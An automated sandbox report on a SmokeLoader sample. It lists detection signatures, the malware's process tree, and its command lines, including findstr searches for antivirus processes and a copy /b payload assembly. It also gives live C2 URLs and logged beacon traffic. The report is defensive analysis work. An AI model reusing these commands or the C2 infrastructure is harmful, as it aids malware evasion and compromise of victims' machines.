Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1435516
MD5:0c4cb8fd1e3cc4b42556562d317e6e59
SHA1:8a572e6ef21e54b76cf0b38099c6ca47d607170e
SHA256:e787e9b3eb07676a4848cb9ff1dad9a19a5b3aa11a220b2ba3d447ac6680abeb
Tags:exe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Drops PE files with a suspicious file extension
Found API chain indicative of debugger detection
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0C4CB8FD1E3CC4B42556562D317E6E59)
    • cmd.exe (PID: 7548 cmdline: "C:\Windows\System32\cmd.exe" /k move Spirit Spirit.cmd & Spirit.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7600 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7608 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7644 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7652 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7688 cmdline: cmd /c md 1151 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7704 cmdline: findstr /V "decentrisingadvertisementssuite" Appliance MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7720 cmdline: cmd /c copy /b Annually + Protective 1151\b MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Existence.pif (PID: 7736 cmdline: 1151\Existence.pif 1151\b MD5: 62D09F076E6E0240548C2F837536A46A)
        • Existence.pif (PID: 280 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif MD5: 62D09F076E6E0240548C2F837536A46A)
          • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • PING.EXE (PID: 7768 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • ssjhrji (PID: 7668 cmdline: C:\Users\user\AppData\Roaming\ssjhrji MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://cellc.org/tmp/index.php", "http://h-c-v.ru/tmp/index.php", "http://icebrasilpr.com/tmp/index.php", "http://piratia-life.ru/tmp/index.php", "http://piratia.su/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        Click to see the 1 entries

        System Summary

        barindex
        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 1151\Existence.pif 1151\b, CommandLine: 1151\Existence.pif 1151\b, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif, NewProcessName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif, OriginalFileName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Spirit Spirit.cmd & Spirit.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7548, ParentProcessName: cmd.exe, ProcessCommandLine: 1151\Existence.pif 1151\b, ProcessId: 7736, ProcessName: Existence.pif

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Spirit Spirit.cmd & Spirit.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7548, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 7652, ProcessName: findstr.exe
        Timestamp:05/02/24-20:49:25.562996
        SID:2039103
        Source Port:49744
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-20:49:29.611454
        SID:2039103
        Source Port:49747
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-20:49:38.222924
        SID:2039103
        Source Port:49754
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-20:49:33.652088
        SID:2039103
        Source Port:49750
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-20:49:35.713703
        SID:2039103
        Source Port:49752
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-20:49:30.529068
        SID:2039103
        Source Port:49748
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-20:49:26.484537
        SID:2039103
        Source Port:49745
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-20:49:27.548348
        SID:2039103
        Source Port:49746
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-20:49:31.455151
        SID:2039103
        Source Port:49749
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-20:49:39.138361
        SID:2039103
        Source Port:49755
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-20:49:34.799212
        SID:2039103
        Source Port:49751
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-20:49:37.305666
        SID:2039103
        Source Port:49753
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://2no.co/16G965uAvira URL Cloud: Label: malware
        Source: https://2no.co/16G965ZAvira URL Cloud: Label: malware
        Source: https://2no.co/Avira URL Cloud: Label: malware
        Source: http://piratia.su/tmp/index.phpAvira URL Cloud: Label: malware
        Source: http://h-c-v.ru/tmp/index.phpAvira URL Cloud: Label: malware
        Source: https://2no.co/16G965Avira URL Cloud: Label: malware
        Source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://cellc.org/tmp/index.php", "http://h-c-v.ru/tmp/index.php", "http://icebrasilpr.com/tmp/index.php", "http://piratia-life.ru/tmp/index.php", "http://piratia.su/tmp/index.php"]}
        Source: file.exeReversingLabs: Detection: 18%
        Source: file.exeJoe Sandbox ML: detected
        Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0079E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_0079E472
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0079DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0079DC54
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007AA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_007AA087
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007AA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_007AA1E2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007AA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_007AA570
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0076C622 FindFirstFileExW,10_2_0076C622
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007A66DC FindFirstFileW,FindNextFileW,FindClose,10_2_007A66DC
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007A7333 FindFirstFileW,FindClose,10_2_007A7333
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007A73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_007A73D4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0079D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0079D921
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007AA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_007AA087
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007AA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_007AA1E2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0079E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_0079E472
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007AA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_007AA570
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0076C622 FindFirstFileExW,16_2_0076C622
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007A66DC FindFirstFileW,FindNextFileW,FindClose,16_2_007A66DC
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007A7333 FindFirstFileW,FindClose,16_2_007A7333
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007A73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_007A73D4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0079D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_0079D921
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0079DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_0079DC54
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B4A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00B4A087
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B4A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00B4A1E2
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B3E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,19_2_00B3E472
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B4A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_00B4A570
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B466DC FindFirstFileW,FindNextFileW,FindClose,19_2_00B466DC
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_00B473D4
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B47333 FindFirstFileW,FindClose,19_2_00B47333
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B3D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00B3D921
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B3DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00B3DC54
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

        Networking

        barindex
        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49744 -> 186.10.34.243:80
        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49745 -> 186.10.34.243:80
        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49746 -> 186.10.34.243:80
        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49747 -> 186.10.34.243:80
        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49748 -> 186.10.34.243:80
        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49749 -> 186.10.34.243:80
        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49750 -> 186.10.34.243:80
        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49751 -> 186.10.34.243:80
        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49752 -> 186.10.34.243:80
        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49753 -> 186.10.34.243:80
        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49754 -> 186.10.34.243:80
        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49755 -> 186.10.34.243:80
        Source: C:\Windows\explorer.exeNetwork Connect: 186.10.34.243 80Jump to behavior
        Source: Malware configuration extractorURLs: http://cellc.org/tmp/index.php
        Source: Malware configuration extractorURLs: http://h-c-v.ru/tmp/index.php
        Source: Malware configuration extractorURLs: http://icebrasilpr.com/tmp/index.php
        Source: Malware configuration extractorURLs: http://piratia-life.ru/tmp/index.php
        Source: Malware configuration extractorURLs: http://piratia.su/tmp/index.php
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
        Source: Joe Sandbox ViewIP Address: 104.21.79.229 104.21.79.229
        Source: Joe Sandbox ViewASN Name: ENTELCHILESACL ENTELCHILESACL
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynwsxoervaie.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: cellc.org
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://khjhprifrxebx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: cellc.org
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yyyjoidqibgvbs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: cellc.org
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jyvmasmiydvgjuu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: cellc.org
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qkoxdyhgicus.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: cellc.org
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wsacracxaao.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: cellc.org
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhdnvpjjjnb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: cellc.org
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hberlqlxvspxm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: cellc.org
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ndsmsdugaunva.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: cellc.org
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kxgtxppvhlmsi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: cellc.org
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dgqkmisxnbbni.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: cellc.org
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwgftqaxwugurgs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: cellc.org
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007AD95F InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,10_2_007AD95F
        Source: global trafficHTTP traffic detected: GET /16G965 HTTP/1.1User-Agent: WalkHost: 2no.co
        Source: global trafficDNS traffic detected: DNS query: 2no.co
        Source: global trafficDNS traffic detected: DNS query: rgcVXPIqSMzHmoPyVwzhcGh.rgcVXPIqSMzHmoPyVwzhcGh
        Source: global trafficDNS traffic detected: DNS query: cellc.org
        Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynwsxoervaie.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: cellc.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 02 May 2024 18:49:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 04 00 00 00 72 e8 85 ed Data Ascii: r
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 02 May 2024 18:49:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
